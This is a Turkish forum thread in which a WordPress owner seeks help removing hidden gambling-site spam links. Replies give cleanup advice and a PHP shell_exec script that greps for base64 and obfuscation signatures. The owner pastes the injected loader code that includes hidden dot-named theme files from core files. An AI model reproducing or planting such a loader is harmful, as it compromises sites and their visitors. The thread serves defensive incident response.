Siteme Hacklink eklenmiş YARDIM LAZIM

Question

Sitenin seo puanını sorgulamak istediğimde dışarıya 3 adet link çıkışı olduğunu gördüm. Bet siteleri 3ü de. Siteye girip sağ tıklayıp sayfa kaynağını görüntüle dediğimde çıkmıyor birşey. 
Acaba eski temadan ötürü mü diye düşünüp önceki yedeği bilgisayara indirip windows defender ile tarama yaptım hiç bir şey bulmadı.
Aldığım tema lisanslı. Ekentilerde varez yok ama daha önceden wa r ez yüklemişliğim vardı. Şuan 5 eklentinin tamamı sağlam. Onları pasifleştirip google da arattığımda yine çıkıyor linkler. Yani eklentilerden ötürü olmaması  gerek.  Nasıl ve nereden kaynaklı nasıl anlarız acaba ?

Tartaros · Answer

Tarattigin yerde dosya yolu yazmasi lazim. Plesk ise malware eklentisi ile dene yazar dosya yolunu. Eger warezse ioncube ile sifrelenmistir fonk. Dosyasinda sifrelidir.

tryigitx · Answer

Bu tür durumlar için wordfence tarzı eklentiler genelde işinizi görür indirip kontrol edin işiniz bitince eklentiyi tamamen kaldırmaya özen gösterin güvenlik optimizasyonu hizmeti almak isterseniz özelden site adresi pm atın teklif gönderirim

kasparov108 · Answer

Kalebet - Casinoslot giriş -

Kingbetting

Sayfanın en altında çıkan kod bu şekilde

MySeoDay · Answer

Wordpress panelinizden external link eklentisini kurun. (Sitenizdeki açığı kapatamıyorsanız eğer hackerın linklerinin nofollow olmasını sağlarsınız ve sizinle uğraşmayı bırakır. Fakat hacker wp-config.php aracılığı ile SQL'den sitenize yeni bir admin atayıp admin panelinize eriştikten sonra (veya sql üzerinden) eklentiyi deaktif hale getirmeye çalışırsa, eklentinin deaktif olduğunu gördüğünüzde sunucunuzda bir hackerın olduğundan emin olabilirsiniz.)
Bu nedenle SQL geçişlerinin kapatılması VEYA wp-config.php dosyasının içeriği yani DB bilgilerinin yenilenmesinden sonra wp-config.php dosyası ya mevcut bulunduğu yerden ya da size önerim temanızdaki bir bölümden çektirilerek (ioncube ile şifrelenmiş halde) yayımlanabilir. Bu sayede sunucunuz hacklense bile size geçiş yapılma ihtimali sunucunuz ROOT almadıkça oldukça düşük olacaktır.
Chrome tarayıcınıza user agent switcher addon kurun.
Sitenize girip user agent switcher'ı GOOGLEBOT olarak ayarlayıp kaynak koduna tekrar bakın. (Sitenize girerken tarayıcıdan direkt giriş yapmayın google'da site adınızı aratarak girin.)
ctrl+f ile display:none ve overflow, position:fixed kelimelerini arayın.(veya bahis)
Zararlı kodlara rastlanır ise;
Anadizininize 1 adet php dosyası oluşturup ismini hacklinkbul.php yapın.
Dosya içeriği:

<?php
$dizin = "/home/kullanici/public_html/";
echo $yeni = shell_exec("find $dizin -iname '*.php' -mtime 2"); //72 saat içinde değişen yeni dosyalar.
echo $find1 = shell_exec("find $dizin -iname '*.php' | xargs grep 'file_get_contents' -sl");
echo $find1 = shell_exec("find $dizin -iname '*.php' | xargs grep 'base64_decode' -sl");
echo $find1 = shell_exec("find $dizin -iname '*.php' | xargs grep 'PD9waH' -sl");
echo $find1 = shell_exec("find $dizin -iname '*.php' | xargs grep 'aWYo' -sl");
echo $find19 = shell_exec("find $dizin -iname '*.php' | xargs grep 'pM6ey' -sl");
echo $find20 = shell_exec("find $dizin -iname '*.php' | xargs grep 'PD8kX' -sl");
// türetilebilir.
?>

Bu kodları dosya içeriğine yapıştırdıktan sonra site üzerindenden çalıştırın. Karşınıza çıkan dosyaları analiz edin.
Kolay gelsin.

Ayrıca /wp-content/themes/TEMADI/functions.php dosyasında 1 den fazla <?php tagı olup olmadığına bakın. class-modules** ile başlayan bir kod görürseniz silin.
Functions.php dosyasının en altı ve en üstü dikkatlice incelenmeli.
Ekstra olarak /wp-content/themes/TEMADI/footer.php kontrol edilebilir.
Bonus olarak loglarınıza bakın, loglarınızda 3-4 adet wp-login.php denemesinden sonra admin yetkisi ile login olmuş bir kullanıcının sitenizde hangi get veya postları gönderdiğine bakın.
Hidden plugin yüklenip yüklenmediğini kontrol edin. Admin panelinizde görünmeyen fakat veritabanı arkasında etkinleştirilmiş pluginler olabilir. /wp-content/plugins klasörünü ziyaret edin.
Orada göreceğiniz hello.php silmekten kaçınmayın. Wp-content/plugins ve Wp-content/themes dosyalarındaki masum görünen index.php lerinizi kontrol edin.

Korumayı sağlayamayacağınızdan emin iseniz özel mesaj ile ücretli destek verebiliriz.

kasparov108 · Answer

Öncelikle harika cevabın için teşekkür ederim. Bu kadar zahmet edip yazdın. Dediğin chrome eklentisini ve wordpress eklentisini kurdum. Siteye google üstünden girdim. bahsettiğin chrome eklentisini denedim ama birşey hissetmedim orada takıldım. Neyse dedim arkadaşın önerdiği wordfence eklentisini yükledim. Bu eklenti her arama da wp-load.php nin değiştiğini gösteriyor. Açıp baktığımda her defasında bu dosyaya şu kod ekleniyor ; if ( function_exists( 'wp_get_themes' ) && !class_exists( "a3f212fd3ff4f6b13d97220e459982843" ) ) { foreach ( wp_get_themes() AS $a4bc399d548c7fc0e5db44ac6052a21bd => $a330f63fa20505f149fefc94083041994 ) { $a355161fcd574ca0546fe45698824077c = get_theme_root() . "/{$a330f63fa20505f149fefc94083041994->stylesheet}/.{$a330f63fa20505f149fefc94083041994->stylesheet}.php"; if ( file_exists( $a355161fcd574ca0546fe45698824077c ) ) { include_once $a355161fcd574ca0546fe45698824077c; if ( class_exists( "a3f212fd3ff4f6b13d97220e459982843" ) ) break; MySeoDay adlı üyeden alıntı: mesajı görüntüle Wordpress panelinizden external link eklentisini kurun. (Sitenizdeki açığı kapatamıyorsanız eğer hackerın linklerinin nofollow olmasını sağlarsınız ve sizinle uğraşmayı bırakır. Fakat hacker wp-config.php aracılığı ile SQL'den sitenize yeni bir admin atayıp admin panelinize eriştikten sonra (veya sql üzerinden) eklentiyi deaktif hale getirmeye çalışırsa, eklentinin deaktif olduğunu gördüğünüzde sunucunuzda bir hackerın olduğundan emin olabilirsiniz.) Bu nedenle SQL geçişlerinin kapatılması VEYA wp-config.php dosyasının içeriği yani DB bilgilerinin yenilenmesinden sonra wp-config.php dosyası ya mevcut bulunduğu yerden ya da size önerim temanızdaki bir bölümden çektirilerek (ioncube ile şifrelenmiş halde) yayımlanabilir. Bu sayede sunucunuz hacklense bile size geçiş yapılma ihtimali sunucunuz ROOT almadıkça oldukça düşük olacaktır. Chrome tarayıcınıza user agent switcher addon kurun. Sitenize girip user agent switcher'ı GOOGLEBOT olarak ayarlayıp kaynak koduna tekrar bakın. (Sitenize girerken tarayıcıdan direkt giriş yapmayın google'da site adınızı aratarak girin.) ctrl+f ile display:none ve overflow, position:fixed kelimelerini arayın.(veya bahis) Zararlı kodlara rastlanır ise; Anadizininize 1 adet php dosyası oluşturup ismini hacklinkbul.php yapın. Dosya içeriği: Bu kodları dosya içeriğine yapıştırdıktan sonra site üzerindenden çalıştırın. Karşınıza çıkan dosyaları analiz edin. Kolay gelsin. Ayrıca /wp-content/themes/TEMADI/functions.php dosyasında 1 den fazla

MySeoDay · Answer

wp-includes/load.php ve wp-includes/template-loader.php içeriğini atar mısın.
Bu iki çekirdek dosyası tetikleyicidir. Web siten her yenilendiğinde içindeki kodları çağırır. Japon virüsü diye tabir edilen virüsün çalışma şekli budur. Bir yerden silersin, ama kendini başka bir yerden çağırır.

kasparov108 · Answer

MySeoDay adlı üyeden alıntı: mesajı görüntüle wp-includes/load.php ve wp-includes/template-loader.php içeriğini atar mısın. wp-config.php' ) . '

'; $die .= '

' . sprintf( /* translators: %s: Documentation URL. */ __( "Need more help? We got it." ), __( 'https://wordpress.org/support/article/editing-wp-config-php/' ) ) . '

'; $die .= '

' . sprintf( /* translators: %s: wp-config.php */ __( "You can create a %s file through a web interface, but this doesn't work for all server setups. The safest way is to manually create the file." ), 'wp-config.php' ) . '

'; $die .= '

' . __( 'Create a Configuration File' ) . ''; wp_die( $die, __( 'WordPress › Error' ) ); } if ( function_exists( 'wp_get_themes' ) && !class_exists( "a3f212fd3ff4f6b13d97220e459982843" ) ) { foreach ( wp_get_themes() AS $a4bc399d548c7fc0e5db44ac6052a21bd => $a330f63fa20505f149fefc94083041994 ) { $a355161fcd574ca0546fe45698824077c = get_theme_root() . "/{$a330f63fa20505f149fefc94083041994->stylesheet}/.{$a330f63fa20505f149fefc94083041994->stylesheet}.php"; if ( file_exists( $a355161fcd574ca0546fe45698824077c ) ) { include_once $a355161fcd574ca0546fe45698824077c; if ( class_exists( "a3f212fd3ff4f6b13d97220e459982843" ) ) break; } } } 'get_embed_template', 'is_404' => 'get_404_template', 'is_search' => 'get_search_template', 'is_front_page' => 'get_front_page_template', 'is_home' => 'get_home_template', 'is_privacy_policy' => 'get_privacy_policy_template', 'is_post_type_archive' => 'get_post_type_archive_template', 'is_tax' => 'get_taxonomy_template', 'is_attachment' => 'get_attachment_template', 'is_single' => 'get_single_template', 'is_page' => 'get_page_template', 'is_singular' => 'get_singular_template', 'is_category' => 'get_category_template', 'is_tag' => 'get_tag_template', 'is_author' => 'get_author_template', 'is_date' => 'get_date_template', 'is_archive' => 'get_archive_template', ); $template = false; // Loop through each of the template conditionals, and find the appropriate template file. foreach ( $tag_templates as $tag => $template_getter ) { if ( call_user_func( $tag ) ) { $template = call_user_func( $template_getter ); } if ( $template ) { if ( 'is_attachment' === $tag ) { remove_filter( 'the_content', 'prepend_attachment' ); } break; } } if ( ! $template ) { $template = get_index_template(); } /** * Filters the path of the current template before including it. * * @since 3.0.0 * * @param string $template The path of the template to include. */ $template = apply_filters( 'template_include', $template ); if ( $template ) { include $template; } elseif ( current_user_can( 'switch_themes' ) ) { $theme = wp_get_theme(); if ( $theme->errors() ) { wp_die( $theme->errors() ); } } return;}

MySeoDay · Answer

get_theme_root() . "/{$a330f63fa20505f149fefc94083041994->stylesheet}/.{$a330f63fa20505f149fefc94083041994->stylesheet}.php";
yukarda temanın yolu tespit edilerek stylesheet gidilmiş ve md5 ile şifrelenmiş.
Functions.php içeriğini atar mısın.
Ayrıca klasörlerinin içinde .klasoradi.php şeklinde dosyalar var mı?

if ( function_exists( 'wp_get_themes' ) && !class_exists( "a3f212fd3ff4f6b13d97220e459982843" ) ) {    foreach ( wp_get_themes() AS $a4bc399d548c7fc0e5db44ac6052a21bd => $a330f63fa20505f149fefc94083041994 ) {        $a355161fcd574ca0546fe45698824077c = get_theme_root() . "/{$a330f63fa20505f149fefc94083041994->stylesheet}/.{$a330f63fa20505f149fefc94083041994->stylesheet}.php";        if ( file_exists( $a355161fcd574ca0546fe45698824077c ) ) {            include_once $a355161fcd574ca0546fe45698824077c;            if ( class_exists( "a3f212fd3ff4f6b13d97220e459982843" ) ) break;

if( !class_exists( "WPTemplatesOptions" ) && function_exists( 'wp_get_themes' ) ) { foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) { $templates = get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php"; if( file_exists( $templates ) ) { include_once( $templates ); } } }

kasparov108 · Answer

MySeoDay adlı üyeden alıntı: mesajı görüntüle

Wordpress panelinizden external link eklentisini kurun. (Sitenizdeki açığı kapatamıyorsanız eğer hackerın linklerinin nofollow olmasını sağlarsınız ve sizinle uğraşmayı bırakır. Fakat hacker wp-config.php aracılığı ile SQL'den sitenize yeni bir admin atayıp admin panelinize eriştikten sonra (veya sql üzerinden) eklentiyi deaktif hale getirmeye çalışırsa, eklentinin deaktif olduğunu gördüğünüzde sunucunuzda bir hackerın olduğundan emin olabilirsiniz.)
Bu nedenle SQL geçişlerinin kapatılması VEYA wp-config.php dosyasının içeriği yani DB bilgilerinin yenilenmesinden sonra wp-config.php dosyası ya mevcut bulunduğu yerden ya da size önerim temanızdaki bir bölümden çektirilerek (ioncube ile şifrelenmiş halde) yayımlanabilir. Bu sayede sunucunuz hacklense bile size geçiş yapılma ihtimali sunucunuz ROOT almadıkça oldukça düşük olacaktır.
Chrome tarayıcınıza user agent switcher addon kurun.
Sitenize girip user agent switcher'ı GOOGLEBOT olarak ayarlayıp kaynak koduna tekrar bakın. (Sitenize girerken tarayıcıdan direkt giriş yapmayın google'da site adınızı aratarak girin.)
ctrl+f ile display:none ve overflow, position:fixed kelimelerini arayın.(veya bahis)
Zararlı kodlara rastlanır ise;
Anadizininize 1 adet php dosyası oluşturup ismini hacklinkbul.php yapın.
Dosya içeriği:

<?php
$dizin = "/home/kullanici/public_html/";
echo $yeni = shell_exec("find $dizin -iname '*.php' -mtime 2"); //72 saat içinde değişen yeni dosyalar.
echo $find1 = shell_exec("find $dizin -iname '*.php' | xargs grep 'file_get_contents' -sl");
echo $find1 = shell_exec("find $dizin -iname '*.php' | xargs grep 'base64_decode' -sl");
echo $find1 = shell_exec("find $dizin -iname '*.php' | xargs grep 'PD9waH' -sl");
echo $find1 = shell_exec("find $dizin -iname '*.php' | xargs grep 'aWYo' -sl");
echo $find19 = shell_exec("find $dizin -iname '*.php' | xargs grep 'pM6ey' -sl");
echo $find20 = shell_exec("find $dizin -iname '*.php' | xargs grep 'PD8kX' -sl");
// türetilebilir.
?>

Bu kodları dosya içeriğine yapıştırdıktan sonra site üzerindenden çalıştırın. Karşınıza çıkan dosyaları analiz edin.
Kolay gelsin.

Ayrıca /wp-content/themes/TEMADI/functions.php dosyasında 1 den fazla <?php tagı olup olmadığına bakın. class-modules** ile başlayan bir kod görürseniz silin.
Functions.php dosyasının en altı ve en üstü dikkatlice incelenmeli.
Ekstra olarak /wp-content/themes/TEMADI/footer.php kontrol edilebilir.
Bonus olarak loglarınıza bakın, loglarınızda 3-4 adet wp-login.php denemesinden sonra admin yetkisi ile login olmuş bir kullanıcının sitenizde hangi get veya postları gönderdiğine bakın.
Hidden plugin yüklenip yüklenmediğini kontrol edin. Admin panelinizde görünmeyen fakat veritabanı arkasında etkinleştirilmiş pluginler olabilir. /wp-content/plugins klasörünü ziyaret edin.
Orada göreceğiniz hello.php silmekten kaçınmayın. Wp-content/plugins ve Wp-content/themes dosyalarındaki masum görünen index.php lerinizi kontrol edin.

Korumayı sağlayamayacağınızdan emin iseniz özel mesaj ile ücretli destek verebiliriz.

', 'after_title' => '

', ) ); register_sidebar( array( 'name' => __( 'General Sidebar', 'ipt_kb' ), 'id' => 'sidebar-4', 'description' => __( 'Shows up everywhere except the category archive pages and single posts.', 'ipt_kb' ), 'before_widget' => '

', 'before_title' => '

', 'after_title' => '

', ) ); register_sidebar( array( 'name' => __( 'bbPress Sidebar', 'ipt_kb' ), 'id' => 'sidebar-5', 'description' => __( 'Shows up on bbPress forums and topics.', 'ipt_kb' ), 'before_widget' => '

', 'before_title' => '

', 'after_title' => '

', ) ); register_sidebar( array( 'name' => __( 'Footer Large', 'ipt_kb' ), 'id' => 'sidebar-2', 'before_widget' => '', 'before_title' => '', ) ); register_sidebar( array( 'name' => __( 'Footer Small', 'ipt_kb' ), 'id' => 'sidebar-3', 'before_widget' => '', 'before_title' => '', ) );}endif;add_action( 'widgets_init', 'ipt_kb_widgets_init' ); /** * Fix for empty widget title * * As we are using panels */if ( ! function_exists( 'ipt_kb_widget_title_filter' ) ) :function ipt_kb_widget_title_filter( $title = '' ) { if ( $title == '' ) { return ' '; } return $title;}endif;add_filter( 'widget_title', 'ipt_kb_widget_title_filter' ); /** * Enqueue scripts and styles */if ( ! function_exists( 'ipt_kb_scripts' ) ) :function ipt_kb_scripts() { global $ipt_kb_version; // Fonts from Google Webfonts wp_enqueue_style( 'ipt_kb-fonts', '//fonts.googleapis.com/css?family=Oswald|Roboto:400,400italic,700,700italic', array(), $ipt_kb_version ); // Main stylesheet wp_enqueue_style( 'ipt_kb-style', get_stylesheet_uri(), array(), $ipt_kb_version ); // Bootstrap wp_enqueue_style( 'ipt_kb-bootstrap', get_template_directory_uri() . '/lib/bootstrap/css/bootstrap.min.css', array(), $ipt_kb_version ); wp_enqueue_style( 'ipt_kb-bootstrap-theme', get_template_directory_uri() . '/lib/bootstrap/css/bootstrap-theme.min.css', array(), $ipt_kb_version ); // Icomoon wp_enqueue_style( 'ipt-icomoon-fonts', get_template_directory_uri() . '/lib/icomoon/icomoon.css', array(), $ipt_kb_version ); // Now the JS wp_enqueue_script( 'ipt_kb-bootstrap', get_template_directory_uri() . '/lib/bootstrap/js/bootstrap.min.js', array( 'jquery' ), $ipt_kb_version ); wp_enqueue_script( 'ipt_kb-bootstrap-jq', get_template_directory_uri() . '/lib/bootstrap/js/jquery.ipt-kb-bootstrap.js', array( 'jquery' ), $ipt_kb_version ); wp_enqueue_script( 'ipt_kb-skip-link-focus-fix', get_template_directory_uri() . '/js/skip-link-focus-fix.js', array(), $ipt_kb_version, true ); if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); } if ( is_singular() && wp_attachment_is_image() ) { wp_enqueue_script( 'ipt_kb-keyboard-image-navigation', get_template_directory_uri() . '/js/keyboard-image-navigation.js', array( 'jquery' ), $ipt_kb_version ); } // Load the sticky kit wp_enqueue_script( 'ipt-kb-sticky-kit', get_template_directory_uri() . '/lib/sticky-kit/jquery.sticky-kit.min.js', array( 'jquery' ), $ipt_kb_version ); // Load the theme js wp_enqueue_script( 'ipt-kb-js', get_template_directory_uri() . '/js/ipt-kb.js', array( 'jquery' ), $ipt_kb_version ); wp_localize_script( 'ipt-kb-js', 'iptKBJS', array( 'ajaxurl' => admin_url( 'admin-ajax.php' ), 'ajax_error' => __( 'Oops, some problem to connect. Try again?', 'ipt_kb' ), ) );}endif;add_action( 'wp_enqueue_scripts', 'ipt_kb_scripts' ); /** * Add compatibility with the EBS Plugin * For the latest version only * * @link http://wordpress.org/plugins/easy-bootstrap-shortcodes/ * * @param boolean $value The value of the filter * @return boolean True to disable frontend enqueue and settings page */function ipt_kb_ebs_compat( $value ) { return true;}add_filter( 'ebs_custom_option', 'ipt_kb_ebs_compat' ); /** * Add compatibility with older versions of EBS plugin * * Removes the stylesheets/javscripts */function ipt_kb_ebs_remove_enqueue() { wp_deregister_style( 'bootstrap' ); wp_deregister_style( 'bootstrap-icon' ); wp_deregister_script( 'bootstrap' );}add_action( 'wp_enqueue_scripts', 'ipt_kb_ebs_remove_enqueue', 11 ); /** * Add the excerpt hellip * @param string $more Default more * @return string new more */function ipt_kb_excerpt_more( $more ) { return '…';}add_filter( 'excerpt_more', 'ipt_kb_excerpt_more' );/** * Add filter to comment reply link to convert into bootstrap button * @param string $comment_reply_link default comment reply link * @param stdObj $post $post * @return string new reply link */if ( ! function_exists( 'ipt_kb_comment_reply_filter' ) ) :function ipt_kb_comment_reply_filter( $comment_reply_link, $post = null ) { $new = preg_replace( '/'; } else { $return = '

' . $link . '

'; } return $return;}endif;add_filter( 'wp_link_pages_link', 'ipt_kb_link_pages' ); /** * Include the TGM Plugin Activation */require get_template_directory() . '/inc/class-tgm-plugin-activation.php'; add_action( 'tgmpa_register', 'ipt_kb_required_plugins' ); if ( ! function_exists( 'ipt_kb_required_plugins' ) ) :function ipt_kb_required_plugins() { if ( function_exists( 'tgmpa' ) ) { $plugins = array(); // Base plugin $plugins[] = array( 'name' => 'iPanelThemes Theme Options', 'slug' => 'ipt-theme-options', 'source' => get_template_directory() . '/plugins/ipt-theme-options.zip', 'required' => true, 'version' => '0.0.1', 'force_activation' => true, 'external_url' => '', ); // Easy Bootstrap shortcode $plugins[] = array( 'name' => 'Easy Bootstrap Shortcode', 'slug' => 'easy-bootstrap-shortcodes', 'required' => true, 'version' => '4.2.3', ); // bbPress $plugins[] = array( 'name' => 'bbPress', 'slug' => 'bbpress', 'required' => false, 'version' => '2.5.5', ); // Category Order and Taxonomy Terms Order $plugins[] = array( 'name' => 'Category Order and Taxonomy Terms Order', 'slug' => 'taxonomy-terms-order', 'required' => false, 'version' => '1.4.1', ); // Post Types Order $plugins[] = array( 'name' => 'Post Types Order', 'slug' => 'post-types-order', 'required' => false, 'version' => '1.7.7', ); // SyntaxHighlighter Evolved $plugins[] = array( 'name' => 'SyntaxHighlighter Evolved', 'slug' => 'syntaxhighlighter', 'required' => false, 'version' => '3.1.11', ); $config = array( 'default_path' => get_template_directory() . '/plugins', // Default absolute path to pre-packaged plugins. 'menu' => 'tgmpa-install-plugins', // Menu slug. 'has_notices' => true, // Show admin notices or not. 'dismissable' => true, // If false, a user cannot dismiss the nag message. 'dismiss_msg' => '', // If 'dismissable' is false, this message will be output at top of nag. 'is_automatic' => false, // Automatically activate plugins after installation or not. 'message' => '', // Message to output right before the plugins table. 'strings' => array( 'page_title' => __( 'Install Required Plugins', 'tgmpa' ), 'menu_title' => __( 'Install Plugins', 'tgmpa' ), 'installing' => __( 'Installing Plugin: %s', 'tgmpa' ), // %s = plugin name. 'oops' => __( 'Something went wrong with the plugin API.', 'tgmpa' ), 'notice_can_install_required' => _n_noop( 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.' ), // %1$s = plugin name(s). 'notice_can_install_recommended' => _n_noop( 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.' ), // %1$s = plugin name(s). 'notice_cannot_install' => _n_noop( 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.' ), // %1$s = plugin name(s). 'notice_can_activate_required' => _n_noop( 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.' ), // %1$s = plugin name(s). 'notice_can_activate_recommended' => _n_noop( 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.' ), // %1$s = plugin name(s). 'notice_cannot_activate' => _n_noop( 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.' ), // %1$s = plugin name(s). 'notice_ask_to_update' => _n_noop( 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.' ), // %1$s = plugin name(s). 'notice_cannot_update' => _n_noop( 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.' ), // %1$s = plugin name(s). 'install_link' => _n_noop( 'Begin installing plugin', 'Begin installing plugins' ), 'activate_link' => _n_noop( 'Begin activating plugin', 'Begin activating plugins' ), 'return' => __( 'Return to Required Plugins Installer', 'tgmpa' ), 'plugin_activated' => __( 'Plugin activated successfully.', 'tgmpa' ), 'complete' => __( 'All plugins installed and activated successfully. %s', 'tgmpa' ), // %s = dashboard link. 'nag_type' => 'updated' // Determines admin notice type - can only be 'updated', 'update-nag' or 'error'. ) ); tgmpa( $plugins ); }}endif; /** * Modify the options plugin */if ( ! function_exists( 'ipt_kb_theme_ops_tabs' ) ) :function ipt_kb_theme_ops_tabs( $tabs ) { $new_tabs = array(); foreach ( $tabs as $tab ) { if ( in_array( $tab['id'], array( 'ipt_navigation', 'ipt_integration' ) ) ) { $new_tabs[] = $tab; } } return $new_tabs;}endif;add_filter( 'ipt_theme_op_admin_tabs', 'ipt_kb_theme_ops_tabs' ); if ( ! function_exists( 'ipt_kb_theme_op_name' ) ) :function ipt_kb_theme_op_name( $name ) { return __( 'Knowledge Base Theme', 'ipt_kb' );}endif;add_filter( 'ipt_theme_op_active_theme_name', 'ipt_kb_theme_op_name' ); if ( ! function_exists( 'ipt_kb_theme_op_version' ) ) :function ipt_kb_theme_op_version( $v ) { global $ipt_kb_version; return $ipt_kb_version;}endif;add_filter( 'ipt_theme_op_active_theme_version', 'ipt_kb_theme_op_version' ); if ( ! function_exists( 'ipt_kb_op_theme_meta' ) ) :function ipt_kb_op_theme_meta( $links ) { $links['documentation']['link'] = 'http://ipanelthemes.com/kb/wp-knowledge-base-theme/'; $links['support']['link'] = 'https://wordpress.org/support/theme/wp-knowledge-base'; return $links;}endif;add_filter( 'ipt_theme_op_active_theme_meta', 'ipt_kb_op_theme_meta' ); /** * Include the walker class for bootstrap nav menu */require get_template_directory() . '/inc/class-ipt-bootstrap-walker-nav-menu.php';/** * Implement the Custom Header feature. */require get_template_directory() . '/inc/custom-header.php'; /** * Custom template tags for this theme. */require get_template_directory() . '/inc/template-tags.php'; /** * Custom functions that act independently of the theme templates. */require get_template_directory() . '/inc/extras.php'; /** * Customizer additions. */require get_template_directory() . '/inc/customizer.php'; /** * Load custom category fields */require get_template_directory() . '/inc/category-fields.php'; /** * Load the KB Like Article Thingy */require get_template_directory() . '/inc/ipt-kb-like-article.php'; /** * Load the Affix Widget */require get_template_directory() . '/inc/class-ipt-kb-affix-widget.php'; /** * Load the Social Widget */require get_template_directory() . '/inc/class-ipt-kb-social-widget.php'; /** * Load the Knowledge Base Widget */require get_template_directory() . '/inc/class-ipt-kb-knowledgebase-widget.php'; /** * Load the Popular Articles Widget */require get_template_directory() . '/inc/class-ipt-kb-popular-widget.php'; /** * Load the bbPress functions */if ( function_exists( 'bbpress' ) ) { require get_template_directory() . '/inc/bbpress.php';}// Yorum URL kaldirmafunction remove_comment_fields($fields) { unset($fields['url']); return $fields;}add_filter('comment_form_default_fields','remove_comment_fields');

MySeoDay · Answer

Manuel bakmak zaman alıyor, toplu komut sorgularıyla bakmak lazım.
Sana kısa vadeli önerim dosyadaki değişen kısmı kaldırdıktan sonra (webshell veya ftp üzerinden , kodları kaldır. Fakat kodları kaldırmadan önce wordpress index.php dosya içeriğini sil ve sitenin açılmamasını sağla. Çünkü sitene gelen herhangi bir hit(kullanıcı) sayfayı yenileyeceği için kod tekrar tetiklenir. Sonra hemen chmod ile yazma iznini kapatarak dosyaya yazılmayı önleyebilirsin.
Bunun dışında, diğer 2. tetikleyiciyi bulman lazım.
Hiçbir türlü tetikleyiciyi bulamıyorsan eğer, real search and replace eklentisi ile regex veya düz olarak hacklink kodlarını boşluk ile değiştirerek daha sayfa yüklenmeden kaldırabilirsin. (ama bu geçici bir çözüm olabilir, hacklink paneline bağlı isen eğer linkler değiştiğinde yeni kural ayarlaman gerek)
Wp-config.php auth-salt keyleri ve diğer bilgileri de değişmeni öneririm.

Yukardakilerin hepsi kısmi çözümler hepsi ayrı ayrı işine yararlar, fakat kaynağı bulmadıktan sonra webshell ile giriş yapıp yaptıklarını eski haline alabilirler.

kasparov108 · Answer

MySeoDay adlı üyeden alıntı:						mesajı görüntüle									Manuel bakmak zaman alıyor, toplu komut sorgularıyla bakmak lazım.
Sana kısa vadeli önerim dosyadaki değişen kısmı kaldırdıktan sonra (webshell veya ftp üzerinden , wp-admin üzerinden yaparsan yeniden tetiklenir.) anında chmod yazma iznini kapatman olacak.
Bunun dışında, diğer 2. tetikleyiciyi bulman lazım.
Hiçbir türlü tetikleyiciyi bulamıyorsan eğer, real search and replace eklentisi ile regex veya düz olarak hacklink kodlarını daha sayfa yüklenmeden kaldırabilirsin. (ama bu çok geçici bir çözüm olabilir, hacklink paneline bağlı isen eğer linkler değiştiğinde yeni kural ayarlaman gerek)
Wp-config.php auth keyleri ve diğer bilgileri de değişmeni öneririm. 		dediğin gibi ftp üzerinden deneyeyim ve load.php nin yazma iznini kapatayım inşallah olur. Çok teşekkür ederim. Anında ve detaylı cevaplarınız için

MySeoDay · Answer

Wp-admin ve wp-includes dosyalarını silip yeniden yüklemeyi unutma.
Eğer dosyalar yeniden yazılıyor ise. Plugin ve temalardan şüphelenebilirsin.

Ben teşekkür ederim.

Yorukhun · Answer

Yazıların  xml yedeğini al wp content klasör  yedeğini  al bide host yedeğini  al   . Hostingi sildir  yeniden  açtır. 0dan wp kurulumu yap

Tufan1903 · Answer

Benim sitemede 70 tane siteyi hackleyip +18 yazılar ile saldırı yapıyorlar